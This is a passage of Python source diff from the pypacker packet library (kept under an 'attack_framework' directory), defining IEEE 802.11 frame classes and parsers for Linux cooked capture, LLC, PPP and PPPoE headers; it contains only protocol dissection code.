+# from-DS/to-DS combinations, written as binary [from_ds bit][to_ds bit]
+TO_DS_FLAG		= 10
+FROM_DS_FLAG		= 1
+INTER_DS_FLAG		= 11
+
+# Bitshifts for Frame Control
+_VERSION_MASK		= 0x0300
+_TYPE_MASK		= 0x0c00
+_SUBTYPE_MASK		= 0xf000
+_TO_DS_MASK		= 0x0001
+_FROM_DS_MASK		= 0x0002
+_MORE_FRAG_MASK		= 0x0004
+_RETRY_MASK		= 0x0008
+_PWR_MGT_MASK		= 0x0010
+_MORE_DATA_MASK		= 0x0020
+_PROTECTED_MASK		= 0x0040
+_ORDER_MASK		= 0x0080
+
+_VERSION_SHIFT		= 8
+_TYPE_SHIFT		= 10
+_SUBTYPE_SHIFT		= 12
+_TO_DS_SHIFT		= 0
+_FROM_DS_SHIFT		= 1
+_MORE_FRAG_SHIFT	= 2
+_RETRY_SHIFT		= 3
+_PWR_MGT_SHIFT		= 4
+_MORE_DATA_SHIFT	= 5
+_PROTECTED_SHIFT	= 6
+_ORDER_SHIFT		= 7
+
+
+# needed to distinguish subtypes via types
+TYPE_FACTORS		= [16, 32, 64]
+TYPE_FACTOR_PROTECTED	= 128
+
+
+class IEEE80211(pypacker.Packet):
+	__hdr__ = (
+		# AAAABBCC | 00000000
+		# AAAA = subtype BB = type CC = version
+		("framectl", "H", 0),
+		("duration", "H", 0)
+	)
+
+	def _get_version(self):
+		return (self.framectl & _VERSION_MASK) >> _VERSION_SHIFT
+
+	def _set_version(self, val):
+		self.framectl = (val << _VERSION_SHIFT) | (self.framectl & ~_VERSION_MASK)
+
+	def _get_type(self):
+		return (self.framectl & _TYPE_MASK) >> _TYPE_SHIFT
+
+	def _set_type(self, val):
+		self.framectl = (val << _TYPE_SHIFT) | (self.framectl & ~_TYPE_MASK)
+
+	def _get_subtype(self):
+		return (self.framectl & _SUBTYPE_MASK) >> _SUBTYPE_SHIFT
+
+	def _set_subtype(self, val):
+		self.framectl = (val << _SUBTYPE_SHIFT) | (self.framectl & ~_SUBTYPE_MASK)
+
+	def _get_to_ds(self):
+		return (self.framectl & _TO_DS_MASK) >> _TO_DS_SHIFT
+
+	def _set_to_ds(self, val):
+		self.framectl = (val << _TO_DS_SHIFT) | (self.framectl & ~_TO_DS_MASK)
+
+	def _get_from_ds(self):
+		return (self.framectl & _FROM_DS_MASK) >> _FROM_DS_SHIFT
+
+	def _set_from_ds(self, val):
+		self.framectl = (val << _FROM_DS_SHIFT) | (self.framectl & ~_FROM_DS_MASK)
+
+	def _get_from_to_ds(self):
+		return (self.framectl & (_TO_DS_MASK | _FROM_DS_MASK))
+
+	def _get_more_frag(self):
+		return (self.framectl & _MORE_FRAG_MASK) >> _MORE_FRAG_SHIFT
+
+	def _set_more_frag(self, val):
+		self.framectl = (val << _MORE_FRAG_SHIFT) | (self.framectl & ~_MORE_FRAG_MASK)
+
+	def _get_retry(self):
+		return (self.framectl & _RETRY_MASK) >> _RETRY_SHIFT
+
+	def _set_retry(self, val):
+		self.framectl = (val << _RETRY_SHIFT) | (self.framectl & ~_RETRY_MASK)
+
+	def _get_pwr_mgt(self):
+		return (self.framectl & _PWR_MGT_MASK) >> _PWR_MGT_SHIFT
+
+	def _set_pwr_mgt(self, val):
+		self.framectl = (val << _PWR_MGT_SHIFT) | (self.framectl & ~_PWR_MGT_MASK)
+
+	def _get_more_data(self):
+		return (self.framectl & _MORE_DATA_MASK) >> _MORE_DATA_SHIFT
+
+	def _set_more_data(self, val):
+		self.framectl = (val << _MORE_DATA_SHIFT) | (self.framectl & ~_MORE_DATA_MASK)
+
+	def _get_protected(self):
+		return (self.framectl & _PROTECTED_MASK) >> _PROTECTED_SHIFT
+
+	def _set_protected(self, val):
+		self.framectl = (val << _PROTECTED_SHIFT) | (self.framectl & ~_PROTECTED_MASK)
+
+	def _get_order(self):
+		return (self.framectl & _ORDER_MASK) >> _ORDER_SHIFT
+
+	def _set_order(self, val):
+		self.framectl = (val << _ORDER_SHIFT) | (self.framectl & ~_ORDER_MASK)
+
+	version = property(_get_version, _set_version)
+	type = property(_get_type, _set_type)
+	subtype = property(_get_subtype, _set_subtype)
+	to_ds = property(_get_to_ds, _set_to_ds)
+	from_ds = property(_get_from_ds, _set_from_ds)
+	more_frag = property(_get_more_frag, _set_more_frag)
+	retry = property(_get_retry, _set_retry)
+	pwr_mgt = property(_get_pwr_mgt, _set_pwr_mgt)
+	more_data = property(_get_more_data, _set_more_data)
+	protected = property(_get_protected, _set_protected)
+	order = property(_get_order, _set_order)
+	from_to_ds = property(_get_from_to_ds)
+
+	def _dissect(self, buf):
+		self.framectl = struct.unpack(">H", buf[0:2])[0]
+
+		# logger.debug("got protected packet, type/sub/prot: %d/%d/%d" %
+		# (TYPE_FACTORS[self.type], self.subtype, protected_factor))
+		# logger.debug("ieee80211 type/subtype is: %d/%d" % (self.type, self.subtype))
+		self._init_handler(TYPE_FACTORS[self.type] + self.subtype, buf[4:])
+		return 4
+
+	#
+	# mgmt frames
+	#
+	class Beacon(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			# 12 Bits: 0->4095 | 4 Bits
+			# SF SS (LE)
+			("seq_frag", "H", 0),
+			# _ts (integer) is saved as LE
+			("_ts", "Q", 0),
+			("interval", "H", 0x6400),
+			("capa", "H", 0x0100),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		def _get_seq(self):
+			return (self.seq_frag & 0xFF) << 4 | (self.seq_frag >> 12)
+
+		def _set_seq(self, val):
+			self.seq_frag = (val & 0xF) << 12 | (val & 0xFF0) >> 4 | (self.seq_frag & 0x0F00)
+
+		def _get_ts(self):
+			# LE->BE: dirty but simple
+			return struct.unpack("<Q", struct.pack(">Q", self._ts))[0]
+
+		def _set_ts(self, val):
+			self._ts = struct.unpack("<Q", struct.pack(">Q", val))[0]
+
+		seq = property(_get_seq, _set_seq)
+		ts = property(_get_ts, _set_ts)
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[32:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Action(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("category", "B", 0),
+			("code", "B", 0)
+		)
+
+		class BlockAckRequest(pypacker.Packet):
+			__hdr__ = (
+				("dialog", "B", 0),
+				("parameters", "H", 0),
+				("timeout", "H", 0),
+				("starting_seq", "H", 0),
+			)
+
+		class BlockAckResponse(pypacker.Packet):
+			__hdr__ = (
+				("dialog", "B", 0),
+				("status_code", "H", 0),
+				("parameters", "H", 0),
+				("timeout", "H", 0),
+			)
+
+		CATEGORY_BLOCK_ACK	= 3
+		CODE_BLOCK_ACK_REQUEST	= 0
+		CODE_BLOCK_ACK_RESPONSE	= 1
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+		bssid_s = pypacker.get_property_mac("bssid")
+
+		def _dissect(self, buf):
+			# logger.debug(">>>>>>>> ACTION!!!")
+			# category: block ack, code: request or response
+			self._init_handler(buf[20] * 4 + buf[21], buf[22:])
+			return 22
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ProbeReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[20:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ProbeResp(Beacon):
+		pass
+
+	class AssocReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("interval", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[24:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class AssocResp(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("status", "H", 0),
+			("aid", "H", 0),
+			("params", None, triggerlist.TriggerList)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def _dissect(self, buf):
+			self._init_triggerlist("params", buf[26:], IEEE80211._unpack_ies)
+			return len(buf)
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Disassoc(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("reason", "H", 0),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class ReassocReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("capa", "H", 0),
+			("interval", "H", 0),
+			("current_ap", "6s", b"\x00" * 6)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Auth(pypacker.Packet):
+		"""Authentication request."""
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("algo", "H", 0),
+			("seq", "H", 0x0100),
+			("status", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class Deauth(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("bssid", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("reason", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		bssid_s = pypacker.get_property_mac("bssid")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	m_decoder = {
+		M_BEACON	: Beacon,
+		M_ACTION	: Action,
+		M_ASSOC_REQ	: AssocReq,
+		M_ASSOC_RESP	: AssocResp,
+		M_DISASSOC	: Disassoc,
+		M_REASSOC_REQ	: ReassocReq,
+		M_REASSOC_RESP	: AssocResp,
+		M_AUTH		: Auth,
+		M_PROBE_REQ	: ProbeReq,
+		M_PROBE_RESP	: ProbeResp,
+		M_DEAUTH	: Deauth
+	}
+
+	#
+	# Control frames: no need for extra layer: 802.11 Base data is enough
+	#
+
+	class RTS(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class CTS(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+
+	class ACK(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+
+	class BlockAckReq(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("reqctrl", "H", 0),
+			("seq", "H", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class BlockAck(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+			("reqctrl", "H", 0),
+			("seq", "H", 0),
+			("bitmap", "Q", 0)
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	class CFEnd(pypacker.Packet):
+		__hdr__ = (
+			("dst", "6s", b"\x00" * 6),
+			("src", "6s", b"\x00" * 6),
+		)
+
+		dst_s = pypacker.get_property_mac("dst")
+		src_s = pypacker.get_property_mac("src")
+
+		def reverse_address(self):
+			self.dst, self.src = self.src, self.dst
+
+	c_decoder = {
+		C_RTS		: RTS,
+		C_CTS		: CTS,
+		C_ACK		: ACK,
+		C_BLOCK_ACK_REQ	: BlockAckReq,
+		C_BLOCK_ACK	: BlockAck,
+		C_CF_END	: CFEnd
+	}
+
+	#
+	# data frames
+	#
+	class Dataframe(pypacker.Packet):
+		"""
+		DataFrames need special care: there are too many types of field combinations to create classes
+		for every one. Solution: initiate giving lower type "subType" via constructor.
+		In order to use "src/dst/bssid" instead of addrX set from_to_ds of "subType" to one of the following values:
+
+		[Bit 0: from DS][Bit 1: to DS] = [order of fields]
+
+		00 = 0 = dst, src, bssid
+		01 = 1 = bssid, src, dst
+		10 = 2 = dst, bssid, src
+		11 = 3 = RA, TA, DA, SA
+		"""
+		def __init__(self, *arg, **kwargs):
+			if len(arg) > 1:
+				# logger.debug("extracting lower layer type: %r" % arg[1])
+				self.dtype = arg[1]
+			else:
+				self.dtype = self
+			super().__init__(*arg, **kwargs)
+
+		__hdr__ = (
+			("addr1", "6s", b"\x00" * 6),
+			("addr2", "6s", b"\x00" * 6),
+			("addr3", "6s", b"\x00" * 6),
+			("seq_frag", "H", 0),
+			("addr4", "6s", None),		# to/from-DS = 1
+			("qos_ctrl", "H", 0),		# QoS
+			("sec_param", "Q", 0)		# protected
+		)
+
+		def reverse_address(self):
+			if self.dtype.from_to_ds == 0:
+				self.addr1, self.addr2 = self.addr2, self.addr1
+			elif self.dtype.from_to_ds == 1:
+				self.addr2, self.addr3 = self.addr3, self.addr2
+			elif self.dtype.from_to_ds == 2:
+				self.addr1, self.addr3 = self.addr3, self.addr1
+
+		# FromDs, ToDS
+		# 00 = dst, src, bssid
+		# 01 = bssid, src, dst
+		# 10 = dst, bssid, src
+		# 11 = RA, TA, DA, SA
+
+		def __get_src(self):
+			return self.addr2 if self.dtype.from_to_ds in [0, 1] else self.addr3
+
+		def __set_src(self, src):
+			if self.dtype.from_to_ds in [0, 1]:
+				self.addr2 = src
+			else:
+				self.addr3 = src
+
+		def __get_dst(self):
+			return self.addr1 if self.dtype.from_to_ds in [0, 2] else self.addr3
+
+		def __set_dst(self, dst):
+			if self.dtype.from_to_ds in [0, 2]:
+				self.addr1 = dst
+			else:
+				self.addr3 = dst
+
+		def __get_bssid(self):
+			dstype = self.dtype.from_to_ds
+
+			if dstype == 0:
+				return self.addr3
+			elif dstype == 1:
+				return self.addr1
+			elif dstype == 2:
+				return self.addr2
+
+		def __set_bssid(self, bssid):
+			dstype = self.dtype.from_to_ds
+			if dstype == 0:
+				self.addr3 = bssid
+			elif dstype == 1:
+				self.addr1 = bssid
+			elif dstype == 2:
+				self.addr2 = bssid
+
+		src = property(__get_src, __set_src)
+		src_s = pypacker.get_property_mac("src")
+		dst = property(__get_dst, __set_dst)
+		dst_s = pypacker.get_property_mac("dst")
+		bssid = property(__get_bssid, __set_bssid)
+		bssid_s = pypacker.get_property_mac("bssid")
+
+		__QOS_SUBTYPES = set([8, 9, 10, 11, 12, 14, 15])
+
+		def _dissect(self, buf):
+			# logger.debug("starting dissecting, buflen: %r" % str(buf))
+			header_len = 30
+
+			try:
+				is_qos = self.dtype.subtype in IEEE80211.Dataframe.__QOS_SUBTYPES
+				is_protected = self.dtype.protected == 1
+				is_bridge = self.dtype.from_ds == 1 and self.dtype.to_ds == 1
+			except Exception:
+				# logger.debug(e)
+				# default is fromds
+				is_qos = False
+				is_protected = False
+				is_bridge = False
+
+			# logger.debug("switching fields1")
+			if not is_qos:
+				self.qos_ctrl = None
+				header_len -= 2
+			# logger.debug("switching fields2")
+			if not is_protected:
+				self.sec_param = None
+				header_len -= 8
+			# logger.debug("switching fields3")
+			if is_bridge:
+				self.addr4 = b"\x00" * 6
+				header_len += 6
+			# logger.debug("format/length/len(bin): %s/%d/%d" % (self._hdr_fmtstr, self.hdr_len, len(self.bin())))
+			# logger.debug("%r" % self)
+			return header_len
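+
+		# Example (sketch): for a to-DS frame (from_to_ds == 1, station -> AP)
+		# the properties above resolve bssid=addr1, src=addr2, dst=addr3.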
+
+	d_decoder = {
+		D_NORMAL		: Dataframe,
+		D_DATA_CF_ACK		: Dataframe,
+		D_DATA_CF_POLL 		: Dataframe,
+		D_DATA_CF_ACK_POLL 	: Dataframe,
+		D_NULL			: Dataframe,
+		D_CF_ACK		: Dataframe,
+		D_CF_POLL		: Dataframe,
+		D_CF_ACK_POLL		: Dataframe,
+		D_QOS_DATA		: Dataframe,
+		D_QOS_CF_ACK		: Dataframe,
+		D_QOS_CF_POLL		: Dataframe,
+		D_QOS_CF_ACK_POLL	: Dataframe,
+		D_QOS_NULL		: Dataframe,
+		D_QOS_CF_POLL_EMPTY	: Dataframe
+	}
+
+	#
+	# IEs for Mgmt-Frames
+	#
+	@staticmethod
+	def _unpack_ies(buf):
+		"""Parse IEs and return them as Triggerlist."""
+		# each IE starts with an ID and a length
+		ies = []
+		off = 0
+		buflen = len(buf)
+		# logger.debug("lazy dissecting: %s" % buf)
+
+		while off < buflen:
+			ie_id = buf[off]
+			try:
+				parser = IEEE80211.ie_decoder[ie_id]
+			except KeyError:
+				# some unknown tag, use standard format
+				parser = IEEE80211.IE
+
+			dlen = buf[off + 1]
+			# logger.debug("IE parser is: %d = %s = %s" % (ie_id, parser, buf[off: off+2+dlen]))
+			ie = parser(buf[off: off + 2 + dlen])
+			ies.append(ie)
+			off += 2 + dlen
+
+		return ies
+
+	class IE(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0)
+		)
+
+	class FH(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("tu", "H", 0),
+			("hopset", "B", 0),
+			("hoppattern", "B", 0),
+			("hopindex", "B", 0)
+		)
+
+	class DS(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("ch", "B", 0)
+		)
+
+	class CF(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("count", "B", 0),
+			("period", "B", 0),
+			("max", "H", 0),
+			("dur", "H", 0)
+		)
+
+	class TIM(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("count", "B", 0),
+			("period", "B", 0),
+			("ctrl", "H", 0)
+		)
+
+	class IBSS(pypacker.Packet):
+		__hdr__ = (
+			("id", "B", 0),
+			("len", "B", 0),
+			("atim", "H", 0)
+		)
+
+	# IEs
+	IE_SSID			= 0
+	IE_RATES		= 1
+	IE_FH			= 2
+	IE_DS			= 3
+	IE_CF			= 4
+	IE_TIM			= 5
+	IE_IBSS			= 6
+	IE_HT_CAPA		= 45
+	IE_ESR			= 50
+	IE_HT_INFO		= 61
+
+	ie_decoder = {
+		IE_SSID		: IE,
+		IE_RATES	: IE,
+		IE_FH		: FH,
+		IE_DS		: DS,
+		IE_CF		: CF,
+		IE_TIM		: TIM,
+		IE_IBSS		: IBSS,
+		IE_HT_CAPA	: IE,
+		IE_ESR		: IE,
+		IE_HT_INFO	: IE
+	}
+
+
+# handler for IEEE80211
+# position in list = type-ID
+dicts			= [IEEE80211.m_decoder, IEEE80211.c_decoder, IEEE80211.d_decoder]
+decoder_dict_complete	= {}
+
+for pos, decoder_dict in enumerate(dicts):
+	for key, val in decoder_dict.items():
+		# same subtype-ID for different typ-IDs, distinguish via "type_factor + subtype)"
+		decoder_dict_complete[TYPE_FACTORS[pos] + key] = val
+
+pypacker.Packet.load_handler(IEEE80211, decoder_dict_complete)
+
+# handler for Action
+CATEGORY_BLOCK_ACK_FACTOR = IEEE80211.Action.CATEGORY_BLOCK_ACK * 4
+pypacker.Packet.load_handler(IEEE80211.Action,
+	{
+		CATEGORY_BLOCK_ACK_FACTOR + IEEE80211.Action.CODE_BLOCK_ACK_REQUEST: IEEE80211.Action.BlockAckRequest,
+		CATEGORY_BLOCK_ACK_FACTOR + IEEE80211.Action.CODE_BLOCK_ACK_RESPONSE: IEEE80211.Action.BlockAckResponse
+	}
+)
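+
+# Example (sketch): dissecting a management frame; the handler is selected
+# via TYPE_FACTORS[type] + subtype as registered above.
+# ieee = IEEE80211(raw_80211_bytes)	# raw_80211_bytes: assumed capture payload
+# if ieee.type == MGMT_TYPE and ieee.subtype == M_BEACON:
+# 	beacon = ieee[IEEE80211.Beacon]	# beacon.params holds the parsed IEs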

+ 78 - 0
attack_framework/pypacker/layer12/linuxcc.py

@@ -0,0 +1,78 @@
+"""
+Linux cooked capture format
+"""
+
+from pypacker import pypacker
+
+import logging
+import struct
+
+# avoid unneeded references for performance reasons
+pack = struct.pack
+unpack = struct.unpack
+
+logger = logging.getLogger("pypacker")
+
+# Ethernet payload types - http://standards.ieee.org/regauth/ethertype
+LCC_TYPE_PUP		= 0x0200		# PUP protocol
+LCC_TYPE_IP		= 0x0800		# IPv4 protocol
+LCC_TYPE_ARP		= 0x0806		# address resolution protocol
+LCC_TYPE_WOL		= 0x0842		# Wake on LAN
+LCC_TYPE_CDP		= 0x2000		# Cisco Discovery Protocol
+LCC_TYPE_DTP		= 0x2004		# Cisco Dynamic Trunking Protocol
+LCC_TYPE_REVARP		= 0x8035		# reverse addr resolution protocol
+LCC_TYPE_ETHTALK	= 0x809B		# Apple Talk
+LCC_TYPE_AARP		= 0x80F3		# Appletalk Address Resolution Protocol
+LCC_TYPE_8021Q		= 0x8100		# IEEE 802.1Q VLAN tagging
+LCC_TYPE_IPX		= 0x8137		# Internetwork Packet Exchange
+LCC_TYPE_NOV		= 0x8138		# Novell
+LCC_TYPE_IP6		= 0x86DD		# IPv6 protocol
+LCC_TYPE_MPLS_UCAST	= 0x8847		# MPLS unicast
+LCC_TYPE_MPLS_MCAST	= 0x8848		# MPLS multicast
+LCC_TYPE_PPOE_DISC	= 0x8863		# PPPoE Discovery
+LCC_TYPE_PPOE_SESS	= 0x8864		# PPPoE Session
+LCC_TYPE_JUMBOF		= 0x8870		# Jumbo Frames
+LCC_TYPE_PROFINET	= 0x8892		# Realtime-Ethernet PROFINET
+LCC_TYPE_ATAOE		= 0x88A2		# ATA over Ethernet
+LCC_TYPE_ETHERCAT	= 0x88A4		# Realtime-Ethernet Ethercat
+LCC_TYPE_PBRIDGE	= 0x88A8		# Provider Bridging
+LCC_TYPE_POWERLINK	= 0x88AB		# Realtime Ethernet POWERLINK
+LCC_TYPE_LLDP		= 0x88CC		# Link Layer Discovery Protocol
+LCC_TYPE_SERCOS		= 0x88CD		# Realtime Ethernet SERCOS III
+LCC_TYPE_FIBRE_ETH	= 0x8906		# Fibre Channel over Ethernet
+LCC_TYPE_FCOE		= 0x8914		# FCoE Initialization Protocol (FIP)
+
+PACKET_DIR_TO_US	= 0
+PACKET_DIR_FROM_US	= 4
+
+
+class LinuxCC(pypacker.Packet):
+	__hdr__ = (
+		("dir", "H", 4),
+		("addrtype", "H", 0),
+		("addrlen", "H", 0),
+		("info", "Q", 0),		# TODO: Q available?
+		("type", "H", LCC_TYPE_IP)
+	)
+
+	def _dissect(self, buf):
+		htype = unpack(">H", buf[14: 16])[0]
+		# logger.debug("type: %X" % type)
+		self._init_handler(htype, buf[16:])
+		return 16
+
+# load handler
+from pypacker.layer12 import arp, dtp, pppoe
+from pypacker.layer3 import ip, ip6, ipx
+
+pypacker.Packet.load_handler(LinuxCC,
+	{
+		LCC_TYPE_IP: ip.IP,
+		LCC_TYPE_ARP: arp.ARP,
+		LCC_TYPE_DTP: dtp.DTP,
+		LCC_TYPE_IPX: ipx.IPX,
+		LCC_TYPE_IP6: ip6.IP6,
+		LCC_TYPE_PPOE_DISC: pppoe.PPPoE,
+		LCC_TYPE_PPOE_SESS: pppoe.PPPoE
+	}
+)
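+
+# Example (sketch): Linux cooked captures ("any" device) start with this
+# 16-byte header instead of Ethernet.
+# lcc = LinuxCC(raw_sll_bytes)		# raw_sll_bytes: assumed capture payload
+# outgoing = (lcc.dir == PACKET_DIR_FROM_US)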

+ 39 - 0
attack_framework/pypacker/layer12/llc.py

@@ -0,0 +1,39 @@
+from pypacker import pypacker
+import struct
+
+LLC_TYPE_IP		= 0x0800		# IPv4 protocol
+LLC_TYPE_ARP		= 0x0806		# address resolution protocol
+LLC_TYPE_IP6		= 0x86DD		# IPv6 protocol
+
+
+class LLC(pypacker.Packet):
+	__hdr__ = (
+		("dsap", "B", 0),
+		("ssap", "B", 0),
+		("ctrl", "B", 0),
+		("snap", "5s", b"\x00" * 5),
+	)
+
+	def _dissect(self, buf):
+		if buf[0] == 170:		# = 0xAA
+			# SNAP follows ctrl: 3-byte OUI, then the 2-byte EtherType
+			htype = struct.unpack(">H", buf[6: 8])[0]
+			self._init_handler(htype, buf[8:])
+			return 8
+		# no SNAP following: deactivate it
+		self.snap = None
+		return 3
+
+# load handler
+from pypacker.layer12 import arp
+from pypacker.layer3 import ip, ip6
+
+pypacker.Packet.load_handler(LLC,
+	{
+		LLC_TYPE_IP: ip.IP,
+		LLC_TYPE_ARP: arp.ARP,
+		LLC_TYPE_IP6: ip6.IP6,
+	}
+)

+ 44 - 0
attack_framework/pypacker/layer12/ppp.py

@@ -0,0 +1,44 @@
+"""Point-to-Point Protocol."""
+
+from pypacker import pypacker, triggerlist
+
+import logging
+import struct
+
+logger = logging.getLogger("pypacker")
+
+# http://www.iana.org/assignments/ppp-numbers
+PPP_IP	= 0x21		# Internet Protocol
+PPP_IP6 = 0x57		# Internet Protocol v6
+
+# Protocol field compression
+PFC_BIT	= 0x01
+
+
+class PPP(pypacker.Packet):
+	__hdr__ = (
+		("p", None, triggerlist.TriggerList),
+	)
+
+	def _dissect(self, buf):
+		offset = 1
+		ppp_type = buf[0]
+
+		if buf[0] & PFC_BIT == 0:
+			ppp_type = struct.unpack(">H", buf[:2])[0]
+			offset = 2
+			self.p.append(buf[0:2])
+		else:
+			self.p.append(buf[0:1])
+		self._init_handler(ppp_type, buf[offset:])
+		return offset
+
+# load handler
+from pypacker.layer3 import ip, ip6
+
+pypacker.Packet.load_handler(PPP,
+	{
+		PPP_IP: ip.IP,
+		PPP_IP6: ip6.IP6
+	}
+)
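+
+# Example (sketch) of protocol field compression (PFC): an even first byte
+# means an uncompressed 2-byte protocol field, an odd one a compressed 1-byte field.
+# PPP(b"\x00\x21" + ip_bytes)	# uncompressed PPP_IP; ip_bytes: assumed IPv4 packet
+# PPP(b"\x21" + ip_bytes)	# compressed PPP_IP (LSB set)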

+ 49 - 0
attack_framework/pypacker/layer12/pppoe.py

@@ -0,0 +1,49 @@
+"""PPP-over-Ethernet."""
+
+from pypacker import pypacker
+from pypacker.layer12.ppp import PPP
+
+import struct
+
+# RFC 2516 codes
+PPPoE_PADI	= 0x09
+PPPoE_PADO	= 0x07
+PPPoE_PADR	= 0x19
+PPPoE_PADS	= 0x65
+PPPoE_PADT	= 0xA7
+PPPoE_SESSION	= 0x00
+
+
+class PPPoE(pypacker.Packet):
+	__hdr__ = (
+		("v_type", "B", 0x11),
+		("code", "B", 0),
+		("session", "H", 0),
+		("len", "H", 0)		# payload length
+	)
+
+	def __get_v(self):
+		return self.v_type >> 4
+
+	def __set_v(self, v):
+		self.v_type = (v << 4) | (self.v_type & 0xf)
+	v = property(__get_v, __set_v)
+
+	def __get_type(self):
+		return self.v_type & 0xf
+
+	def __set_type(self, t):
+		self.v_type = (self.v_type & 0xf0) | t
+	type = property(__get_type, __set_type)
+
+	def _dissect(self, buf):
+		code = buf[1]
+		if code == PPPoE_SESSION:
+			try:
+				self._set_bodyhandler(PPP(buf[6:]))
+			except (KeyError, struct.error, pypacker.UnpackError):
+				pass
+		return 6
+# TODO: parse discovery tags (TLVs) for PADI/PADO/PADR/PADS/PADT

+ 62 - 0
attack_framework/pypacker/layer12/prism.py

@@ -0,0 +1,62 @@
+"""
+Prism header.
+This packet type exists just for convenience. Radiotap should be prefered over prism
+because of its superior flexibility. Only use this if there is no support for Radiotap
+eg for some Broadcom-Chipsets (stop buying crap man).
+"""
+
+from pypacker import pypacker, triggerlist
+
+import logging
+
+logger = logging.getLogger("pypacker")
+
+
+PRISM_TYPE_80211	= 0
